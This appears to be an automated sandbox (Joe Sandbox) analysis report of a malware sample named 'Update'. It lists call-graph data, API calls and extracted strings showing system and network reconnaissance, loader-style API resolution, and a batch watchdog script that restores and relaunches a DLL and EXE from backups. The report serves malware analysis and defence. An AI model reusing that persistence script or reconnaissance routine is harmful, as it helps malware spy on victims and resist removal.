72994->72997 72998 6c376c5a CryptDestroyHash CryptReleaseContext 72994->72998 72995->72924 72996->72977 72996->72978 72996->72982 72996->72994 73004 6c376980 CryptGetHashParam CryptDestroyHash 72996->73004 72997->72996 72999 6c376cbb CryptDestroyHash CryptReleaseContext 72997->72999 73021 6c38d87e 29 API calls 2 library calls 72998->73021 73023 6c38d87e 29 API calls 2 library calls 72999->73023 73001 6c376c9b 73022 6c38d2b3 RaiseException 73001->73022 73004->72996 73007 6c376c02 CryptReleaseContext 73004->73007 73005 6c376cfc 73024 6c38d2b3 RaiseException 73005->73024 73019 6c38d87e 29 API calls 2 library calls 73007->73019 73009 6c376bdf error_info_injector 73009->72924 73010 6c393a5e 29 API calls 73010->72975 73011->73009 73011->73010 73012 6c376c3a 73020 6c38d2b3 RaiseException 73012->73020 73014->72939 73015->72946 73016->72953 73017->72956 73018->72945 73019->73012 73020->72985 73021->73001 73022->72985 73023->73005 73024->72985 73025->72986 73026->72985 73027->72991 73028->72985 73029->72979 73030->72985 73039 6c38614e 73038->73039 73040 6c3862cc 73039->73040 73042 6c3861ba 73039->73042 73048 6c386152 _Yarn 73039->73048 73054 6c3726c0 30 API calls 3 library calls 73040->73054 73044 6c386252 73042->73044 73045 6c3861da 73042->73045 73043 6c3862d1 73043->72219 73046 6c38aa0e 3 API calls 73044->73046 73047 6c38aa0e 3 API calls 73045->73047 73046->73048 73047->73048 73048->72219 73049->72221 73050->72239 73051->72238 73052->72242 73053->72228 73054->73043 73055->72260 73060 6c38b53d 30 API calls 2 library calls 73056->73060 73059->72276 73061->72285 73062->72300 73063->72316 73070->72348 73089->72337 73151 1000638b 73152 10001100 70 API calls 73151->73152 73153 10006390 73152->73153 73154 1000474c lstrlenW 73155 1001fff8 73154->73155 73156 6c384915 73157 6c384923 DeleteFileA 73156->73157 73158 6c38492e error_info_injector 73157->73158 73159 6c393a5e 29 API calls 73158->73159 73171 6c384d34 error_info_injector 73158->73171 73160 6c384d5d 73159->73160 73182 6c3726c0 30 API calls 3 library calls 73160->73182 73162 6c384d69 73183 6c3726c0 30 API calls 3 library calls 73162->73183 73164 6c384d75 73184 6c3726c0 30 API calls 3 library calls 73164->73184 73166 6c384d81 73185 6c3726c0 30 API calls 3 library calls 73166->73185 73168 6c384d8d 73186 6c3726c0 30 API calls 3 library calls 73168->73186 73170 6c384d99 73187 6c3726c0 30 API calls 3 library calls 73170->73187 73173 6c384da5 73188 6c3726c0 30 API calls 3 library calls 73173->73188 73175 6c384db1 73189 6c3726c0 30 API calls 3 library calls 73175->73189 73177 6c384dbd 73190 6c3726c0 30 API calls 3 library calls 73177->73190 73179 6c384dc9 73191 6c3726c0 30 API calls 3 library calls 73179->73191 73181 6c384dd5 73182->73162 73183->73164 73184->73166 73185->73168 73186->73170 73187->73173 73188->73175 73189->73177 73190->73179 73191->73181 73192 10005eb2 Sleep 73195 10006f17 73192->73195 73197 10006f21 73195->73197 73196 10006e83 _malloc 66 API calls 73196->73197 73197->73196 73198 10005ec9 73197->73198 73201 10006f3d std::exception::exception 73197->73201 73207 10008550 DecodePointer 73197->73207 73206 10006f7b 73201->73206 73208 100073e9 76 API calls __cinit 73201->73208 73202 10006f85 73210 10007836 RaiseException 73202->73210 73205 10006f96 73209 10006e24 66 API calls std::exception::operator= 73206->73209 73207->73197 73208->73206 73209->73202 73210->73205 73211 10006013 73213 10006045 73211->73213 73212 10020003 73213->73212 73216 1000608a 73213->73216 73219 10005e07 73213->73219 73217 100060a0 RegOpenKeyExW 73216->73217 73218 10003f35 __wcsrev 73217->73218 73220 1001f0f9 RegQueryValueExW 73219->73220 73221 10003f35 __wcsrev 73220->73221 73222 6c382a4b 73223 6c38aa0e 3 API calls 73222->73223 73224 6c382a5b _Yarn 73223->73224 73225 6c381070 131 API calls 73224->73225 73228 6c382ac1 error_info_injector 73225->73228 73226 6c382b08 Sleep 73236 6c382b23 _Yarn _strlen 73226->73236 73227 6c384d58 73229 6c393a5e 29 API calls 73227->73229 73228->73226 73228->73227 73230 6c384d5d 73229->73230 73294 6c3726c0 30 API calls 3 library calls 73230->73294 73231 6c384d75 73296 6c3726c0 30 API calls 3 library calls 73231->73296 73234 6c384d69 73295 6c3726c0 30 API calls 3 library calls 73234->73295 73235 6c384d81 73297 6c3726c0 30 API calls 3 library calls 73235->73297 73236->73231 73241 6c38aa0e 3 API calls 73236->73241 73239 6c384d8d 73298 6c3726c0 30 API calls 3 library calls 73239->73298 73246 6c382c36 73241->73246 73242 6c384d99 73299 6c3726c0 30 API calls 3 library calls 73242->73299 73244 6c384da5 73300 6c3726c0 30 API calls 3 library calls 73244->73300 73246->73235 73273 6c380d50 73246->73273 73247 6c384db1 73301 6c3726c0 30 API calls 3 library calls 73247->73301 73250 6c384dbd 73302 6c3726c0 30 API calls 3 library calls 73250->73302 73252 6c384dc9 73303 6c3726c0 30 API calls 3 library calls 73252->73303 73254 6c384dd5 73255 6c382d71 _Yarn error_info_injector _strlen 73255->73227 73255->73239 73256 6c38aa0e 3 API calls 73255->73256 73257 6c382f73 73256->73257 73257->73242 73258 6c380d50 131 API calls 73257->73258 73259 6c38309a error_info_injector 73258->73259 73259->73227 73259->73244 73260 6c383267 73259->73260 73261 6c383297 73259->73261 73262 6c38aa0e 3 API calls 73260->73262 73263 6c38aa0e 3 API calls 73261->73263 73264 6c38327a _Yarn error_info_injector _strlen 73262->73264 73263->73264 73264->73227 73264->73247 73265 6c381070 131 API calls 73264->73265 73268 6c383daa error_info_injector 73265->73268 73266 6c383df7 Sleep 73267 6c38aa0e 3 API calls 73266->73267 73269 6c383e2e 73267->73269 73268->73227 73268->73266 73292 6c385e30 30 API calls 2 library calls 73269->73292 73271 6c383eba 73271->73227 73293 6c37b390 30 API calls 2 library calls 73271->73293 73280 6c380d94 73273->73280 73274 6c380e2c 73274->73255 73275 6c381035 73276 6c375880 30 API calls 73275->73276 73277 6c381041 73276->73277 73281 6c37b880 130 API calls 73277->73281 73278 6c380e70 73287 6c380e7c _Yarn 73278->73287 73304 6c385c90 30 API calls 2 library calls 73278->73304 73280->73274 73280->73275 73280->73278 73282 6c3810d5 73281->73282 73283 6c38112f 73282->73283 73286 6c3811c0 39 API calls 73282->73286 73284 6c37a100 72 API calls 73283->73284 73285 6c38114d std::ios_base::_Ios_base_dtor 73284->73285 73285->73255 73288 6c38110f 73286->73288 73287->73255 73289 6c3798c0 81 API calls 73288->73289 73290 6c381116 SetFileAttributesA 73289->73290 73290->73283 73292->73271 73293->73271 73294->73234 73295->73231 73296->73235 73297->73239 73298->73242 73299->73244 73300->73247 73301->73250 73302->73252 73303->73254 73304->73287 73305 10004274 73306 1001f814 CreateThread 73305->73306 73308 10006110 73306->73308 73308->73308 73309 6c39fc2e 73310 6c39fc3b 73309->73310 73311 6c39fc56 73309->73311 73310->73311 73312 6c39fc47 73310->73312 73313 6c39fc65 73311->73313 73332 6c3a92f4 30 API calls 2 library calls 73311->73332 73331 6c392f04 14 API calls __dosmaperr 73312->73331 73318 6c3a3515 73313->73318 73317 6c39fc4c __fread_nolock 73319 6c3a352d 73318->73319 73320 6c3a3522 73318->73320 73322 6c3a3535 73319->73322 73329 6c3a353e __dosmaperr 73319->73329 73333 6c39a641 15 API calls __dosmaperr 73320->73333 73334 6c39a607 14 API calls __dosmaperr 73322->73334 73323 6c3a352a 73327 6c3a353b 73323->73327 73325 6c3a3568 RtlReAllocateHeap 73325->73327 73325->73329 73326 6c3a3543 73335 6c392f04 14 API calls __dosmaperr 73326->73335 73327->73317 73329->73325 73329->73326 73336 6c3924cf EnterCriticalSection LeaveCriticalSection __dosmaperr 73329->73336 73331->73317 73332->73313 73333->73323 73334->73327 73335->73327 73336->73329 73337 1001f63d send 73338 1001f0df 73345 10002c60 WSAStartup CreateEventW InterlockedExchange 73338->73345 73340 10006f17 77 API calls 73341 1001f0e4 73340->73341 73341->73340 73342 1001f7db 73341->73342 73348 10005a20 CreateEventW 73342->73348 73346 10006815 __fltout2 5 API calls 73345->73346 73347 10002cff 73346->73347 73347->73341 73349 10005a83 73348->73349 73350 10005a79 73348->73350 73376 10006410 HeapCreate 73349->73376 73382 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73350->73382 73354 10005b12 73383 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73354->73383 73355 10005b1c CreateEventW 73357 10005b55 73355->73357 73358 10005b5f CreateEventW 73355->73358 73384 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73357->73384 73360 10005b84 CreateEventW 73358->73360 73361 10005b7a 73358->73361 73362 10005ba9 InitializeCriticalSectionAndSpinCount 73360->73362 73363 10005b9f 73360->73363 73385 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73361->73385 73366 10005c77 InitializeCriticalSectionAndSpinCount 73362->73366 73367 10005c6d 73362->73367 73386 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73363->73386 73369 10005c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 73366->73369 73370 10005c8e 73366->73370 73387 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73367->73387 73372 100067ff 77 API calls 73369->73372 73388 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73370->73388 73373 10005d2b 73372->73373 73374 100067ff 77 API calls 73373->73374 73375 10005d3b 73374->73375 73377 10006441 73376->73377 73378 10006437 73376->73378 73381 10005af2 InitializeCriticalSectionAndSpinCount 73377->73381 73390 10006e49 66 API calls 2 library calls 73377->73390 73389 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 73378->73389 73381->73354 73381->73355 73382->73349 73383->73355 73384->73358 73385->73360 73386->73362 73387->73366 73388->73369 73389->73377 73390->73381

                                                                                            Executed Functions

                                                                                            Function 034E5430 Relevance: 93.2, APIs: 40, Strings: 13, Instructions: 440stringnetworklibraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 34e5430-34e54b7 call 34ef707 call 34f6770 * 3 gethostname gethostbyname 9 34e555c-34e569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 34e7490 GetSystemInfo wsprintfW call 34e6c50 call 34e6ee0 GetForegroundWindow 0->9 10 34e54bd-34e5504 inet_ntoa call 34f03cf * 2 0->10 23 34e569f-34e56ac GetWindowTextW 9->23 24 34e56b2-34e56c0 9->24 10->9 19 34e5506-34e5508 10->19 22 34e5510-34e555a inet_ntoa call 34f03cf * 2 19->22 22->9 23->24 26 34e56cc-34e56f0 lstrlenW call 34e6d70 24->26 27 34e56c2 24->27 33 34e5702-34e5726 call 34ef876 26->33 34 34e56f2-34e56ff call 34ef876 26->34 27->26 39 34e5728 33->39 40 34e5732-34e5756 lstrlenW call 34e6d70 33->40 34->33 39->40 43 34e5768-34e57b9 GetModuleHandleW GetProcAddress 40->43 44 34e5758-34e5765 call 34ef876 40->44 46 34e57bb-34e57c4 GetNativeSystemInfo 43->46 47 34e57c6-34e57cd GetSystemInfo 43->47 44->43 49 34e57d3-34e57e1 46->49 47->49 50 34e57ed-34e57f2 49->50 51 34e57e3-34e57eb 49->51 53 34e57f9-34e5820 wsprintfW call 34e6a70 GetCurrentProcessId 50->53 51->50 52 34e57f4 51->52 52->53 56 34e5885-34e588c call 34e6690 53->56 57 34e5822-34e583c OpenProcess 53->57 65 34e589e-34e58ab 56->65 66 34e588e-34e589c 56->66 57->56 59 34e583e-34e5853 K32GetProcessImageFileNameW 57->59 60 34e585e-34e5866 call 34e80f0 59->60 61 34e5855-34e585c 59->61 67 34e586b-34e586d 60->67 63 34e587f CloseHandle 61->63 63->56 68 34e58ac-34e59a1 call 34ef876 call 34e6490 call 34e6150 call 34efc0e GetTickCount call 34f043c call 34f03a8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 65->68 66->68 69 34e586f-34e5876 67->69 70 34e5878-34e587e 67->70 83 34e59ca-34e59e9 68->83 84 34e59a3-34e59c8 68->84 69->63 70->63 85 34e59ea-34e5a0f call 34e5a30 call 34e3160 83->85 84->85 88 34e5a11-34e5a2e call 34eefff call 34ef00a 85->88
                                                                                            APIs
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                            • _memset.LIBCMT ref: 034E546C
                                                                                            • _memset.LIBCMT ref: 034E5485
                                                                                            • _memset.LIBCMT ref: 034E5495
                                                                                            • gethostname.WS2_32(?,00000032), ref: 034E54A3
                                                                                            • gethostbyname.WS2_32(?), ref: 034E54AD
                                                                                            • inet_ntoa.WS2_32 ref: 034E54C5
                                                                                            • _strcat_s.LIBCMT ref: 034E54D8
                                                                                            • _strcat_s.LIBCMT ref: 034E54F1
                                                                                            • inet_ntoa.WS2_32 ref: 034E551A
                                                                                            • _strcat_s.LIBCMT ref: 034E552D
                                                                                            • _strcat_s.LIBCMT ref: 034E5546
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 034E5573
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 034E5587
                                                                                            • GetLastInputInfo.USER32(?), ref: 034E559A
                                                                                            • GetTickCount.KERNEL32 ref: 034E55A0
                                                                                            • wsprintfW.USER32 ref: 034E55D5
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 034E55E8
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 034E55FC
                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 034E5653
                                                                                            • wsprintfW.USER32 ref: 034E566C
                                                                                            • GetForegroundWindow.USER32 ref: 034E5695
                                                                                            • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 034E56AC
                                                                                            • lstrlenW.KERNEL32(000008CC), ref: 034E56D3
                                                                                            • lstrlenW.KERNEL32(00000994), ref: 034E5739
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 034E57AA
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 034E57B1
                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 034E57C2
                                                                                            • GetSystemInfo.KERNEL32(?), ref: 034E57CD
                                                                                            • wsprintfW.USER32 ref: 034E5806
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 034E5818
                                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 034E582E
                                                                                            • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 034E584B
                                                                                            • CloseHandle.KERNEL32(03505164), ref: 034E587F
                                                                                            • GetTickCount.KERNEL32 ref: 034E58E9
                                                                                            • __time64.LIBCMT ref: 034E58F8
                                                                                            • __localtime64.LIBCMT ref: 034E592F
                                                                                            • wsprintfW.USER32 ref: 034E5968
                                                                                            • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 034E597D
                                                                                            • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 034E598C
                                                                                            • GetCurrentHwProfileW.ADVAPI32(?), ref: 034E5999
                                                                                              • Part of subcall function 034E80F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 034E8132
                                                                                              • Part of subcall function 034E80F0: lstrcmpiW.KERNEL32(?,A:\), ref: 034E8166
                                                                                              • Part of subcall function 034E80F0: lstrcmpiW.KERNEL32(?,B:\), ref: 034E8176
                                                                                              • Part of subcall function 034E80F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 034E81A6
                                                                                              • Part of subcall function 034E80F0: lstrlenW.KERNEL32(?), ref: 034E81B7
                                                                                              • Part of subcall function 034E80F0: __wcsnicmp.LIBCMT ref: 034E81CE
                                                                                              • Part of subcall function 034E80F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 034E8204
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                            • String ID: %d min$1.0$2024.12.27$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                            • API String ID: 1101047656-1105313717
                                                                                            • Opcode ID: b6e0fea18973b0a7d11a964849de86c562518d9679e9dbcf872dc0d14732f90f
                                                                                            • Instruction ID: f98acf1a54c1e6473ae7c668dc1ab5188c8f103f4152e859a83cbca7bf7d8050
                                                                                            • Opcode Fuzzy Hash: b6e0fea18973b0a7d11a964849de86c562518d9679e9dbcf872dc0d14732f90f
                                                                                            • Instruction Fuzzy Hash: 5CF106B5900304AFD720EB64DC45FDB73B8BF44704F00899DE71A9B291EA71AA49CF59
                                                                                            Function 6C377E80 Relevance: 76.9, APIs: 19, Strings: 24, Instructions: 1627fileprocessCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 6C377ED6
                                                                                            • _strlen.LIBCMT ref: 6C377EF2
                                                                                            • _strlen.LIBCMT ref: 6C3781F6
                                                                                            • _strlen.LIBCMT ref: 6C3787FD
                                                                                            • _strlen.LIBCMT ref: 6C378A61
                                                                                            • CopyFileA.KERNEL32(6C389F47,?,00000000), ref: 6C378C17
                                                                                            • _strlen.LIBCMT ref: 6C378C7B
                                                                                            • CopyFileA.KERNEL32(00000000,?,00000000), ref: 6C378E42
                                                                                            • _strlen.LIBCMT ref: 6C37848C
                                                                                              • Part of subcall function 6C3711B0: _strlen.LIBCMT ref: 6C3711E3
                                                                                            • _strlen.LIBCMT ref: 6C378EDD
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,00000000,?,00000001,00000040,00000001), ref: 6C379143
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6C37914E
                                                                                            • CreateProcessA.KERNEL32 ref: 6C379199
                                                                                            • _strlen.LIBCMT ref: 6C3791C3
                                                                                            • CloseHandle.KERNEL32(?,?,00000002,00000040,00000001), ref: 6C379417
                                                                                            • CloseHandle.KERNEL32(?), ref: 6C37941F
                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C37946E
                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C3794BD
                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C379596
                                                                                            Strings
                                                                                            • copy /Y "%BackupDLLPath%" "%DLLPath%", xrefs: 6C37872D
                                                                                            • goto CheckProcess, xrefs: 6C3787B9
                                                                                            • timeout /t 30 /nobreak >nul, xrefs: 6C3787A5
                                                                                            • set "DLLPath=, xrefs: 6C378422
                                                                                            • tor., xrefs: 6C3792E7
                                                                                            • set "ProcessName=, xrefs: 6C378151
                                                                                            • if not exist "%DLLPath%" (, xrefs: 6C378705
                                                                                            • copy /Y "%BackupProcessPath%" "%ProcessPath%", xrefs: 6C3786DD
                                                                                            • echo DLL file not found, restoring from backup..., xrefs: 6C378719
                                                                                            • set "BackupProcessPath=, xrefs: 6C3781C3
                                                                                            • start "" "%ProcessPath%", xrefs: 6C37877D
                                                                                            • b7;l, xrefs: 6C378B3E
                                                                                            • tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul, xrefs: 6C378755
                                                                                            • if %ERRORLEVEL% neq 0 (, xrefs: 6C378769
                                                                                            • Failed to create backup DLL. Please check the DLL path: , xrefs: 6C378C2B
                                                                                            • cmd.exe /B /c "%s", xrefs: 6C37899C
                                                                                            • .pid, xrefs: 6C3792DF
                                                                                            • @echo off, xrefs: 6C378129
                                                                                            • if not exist "%ProcessPath%" (, xrefs: 6C3786BB
                                                                                            • set "ProcessPath=, xrefs: 6C378186
                                                                                            • Failed to create backup EXE. Please check the EXE path: , xrefs: 6C378E56
                                                                                            • echo Process file not found, restoring from backup..., xrefs: 6C3786C9
                                                                                            • set "BackupDLLPath=, xrefs: 6C378459
                                                                                            • :CheckProcess, xrefs: 6C37813D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen$CloseHandleIos_base_dtorstd::ios_base::_$CopyFileProcess$CreateOpenPathTemp
                                                                                            • String ID: copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$.pid$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $b7;l$cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul$tor.
                                                                                            • API String ID: 321380216-3782732667
                                                                                            • Opcode ID: d5a91e81fd8686dbdcfd79bdfa991493bc31a86d3b08f07e7a2b0e33980afebf
                                                                                            • Instruction ID: b159d92b437b9954951729cc14121e34314158e4368adecc40f609fa23b526d3
                                                                                            • Opcode Fuzzy Hash: d5a91e81fd8686dbdcfd79bdfa991493bc31a86d3b08f07e7a2b0e33980afebf
                                                                                            • Instruction Fuzzy Hash: D7E28DB1510B009BE334CF34C884B97B7E5BF95308F144A2DD49A9BB81E779E5498FA2
                                                                                            Function 00910032 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 795memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 009104AE
                                                                                            • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 009104DE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocInfoNativeSystemVirtual
                                                                                            • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                            • API String ID: 2032221330-2899676511
                                                                                            • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                            • Instruction ID: 86bc1051357685beccbd0120257c84fa0a0f6bcfd03ef05648052a4540d7f5f1
                                                                                            • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                            • Instruction Fuzzy Hash: E4628C316083898FD721CF24C840BABBBE5FFD4704F14492DE5C99B251E7B5A988CB56
                                                                                            Function 034EDF10 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 354sleepregistrysynchronizationCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 726 34edf10-34edf72 call 34f0542 Sleep 729 34edf97-34edf9d 726->729 730 34edf74-34edf91 call 34ef707 call 34efa29 CloseHandle 726->730 732 34edf9f call 34e7620 729->732 733 34edfa4-34ee019 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 34efa29 CloseHandle call 34ef707 729->733 730->729 732->733 742 34ee01b-34ee026 call 34e2c90 733->742 743 34ee028 733->743 745 34ee02c-34ee046 call 34ef707 742->745 743->745 749 34ee048-34ee049 call 34e9730 745->749 750 34ee054 745->750 754 34ee04e-34ee052 749->754 751 34ee058 750->751 753 34ee063-34ee06f call 34ece00 751->753 757 34ee0b9-34ee0fa call 34ef876 * 2 753->757 758 34ee071-34ee0b7 call 34ef876 * 2 753->758 754->751 767 34ee100-34ee110 757->767 758->767 768 34ee152-34ee15a 767->768 769 34ee112-34ee14c call 34ece00 call 34ef876 * 2 767->769 771 34ee15c-34ee15e 768->771 772 34ee162-34ee169 768->772 769->768 771->772 774 34ee16b-34ee175 772->774 775 34ee177-34ee17b 772->775 777 34ee181-34ee187 774->777 775->777 779 34ee189-34ee1a3 EnumWindows 777->779 780 34ee1c6-34ee1ee call 34f0542 call 34e2da0 777->780 779->780 783 34ee1a5-34ee1c4 Sleep EnumWindows 779->783 787 34ee200-34ee2ac call 34f0542 CreateEventA call 34ef876 call 34eca70 780->787 788 34ee1f0-34ee1fb Sleep 780->788 783->780 783->783 796 34ee2b7-34ee2bd 787->796 788->753 797 34ee2bf-34ee2f3 Sleep RegOpenKeyExW 796->797 798 34ee318-34ee32c call 34e5430 796->798 799 34ee2f5-34ee30b RegQueryValueExW 797->799 800 34ee311-34ee316 797->800 802 34ee331-34ee337 798->802 799->800 800->796 800->798 803 34ee36a-34ee370 802->803 804 34ee339-34ee365 CloseHandle 802->804 805 34ee372-34ee38e call 34efa29 803->805 806 34ee390 803->806 804->753 809 34ee394 805->809 806->809 811 34ee396-34ee39d 809->811 812 34ee39f-34ee3ae Sleep 811->812 813 34ee40d-34ee420 811->813 812->811 814 34ee3b0-34ee3b7 812->814 817 34ee432-34ee46c call 34f0542 Sleep CloseHandle 813->817 818 34ee422-34ee42c WaitForSingleObject CloseHandle 813->818 814->813 815 34ee3b9-34ee3cb 814->815 821 34ee3dd-34ee408 Sleep CloseHandle 815->821 822 34ee3cd-34ee3d7 WaitForSingleObject CloseHandle 815->822 817->753 818->817 821->753 822->821
                                                                                            APIs
                                                                                              • Part of subcall function 034F0542: __fassign.LIBCMT ref: 034F0538
                                                                                            • Sleep.KERNEL32(00000000), ref: 034EDF64
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 034EDF91
                                                                                            • GetLocalTime.KERNEL32(?), ref: 034EDFA9
                                                                                            • wsprintfW.USER32 ref: 034EDFE0
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(034E75B0), ref: 034EDFEE
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 034EE007
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                            • EnumWindows.USER32(034E5CC0,?), ref: 034EE19D
                                                                                            • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 034EE1AA
                                                                                            • EnumWindows.USER32(034E5CC0,?), ref: 034EE1BE
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 034EE1F5
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 034EE241
                                                                                            • Sleep.KERNEL32(00000FA0), ref: 034EE2C4
                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 034EE2EB
                                                                                            • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 034EE30B
                                                                                            • CloseHandle.KERNEL32(?), ref: 034EE35D
                                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 034EE3A4
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 034EE3D0
                                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 034EE3D7
                                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 034EE3E2
                                                                                            • CloseHandle.KERNEL32(?), ref: 034EE400
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 034EE425
                                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 034EE42C
                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 034EE446
                                                                                            • CloseHandle.KERNEL32(?), ref: 034EE464
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
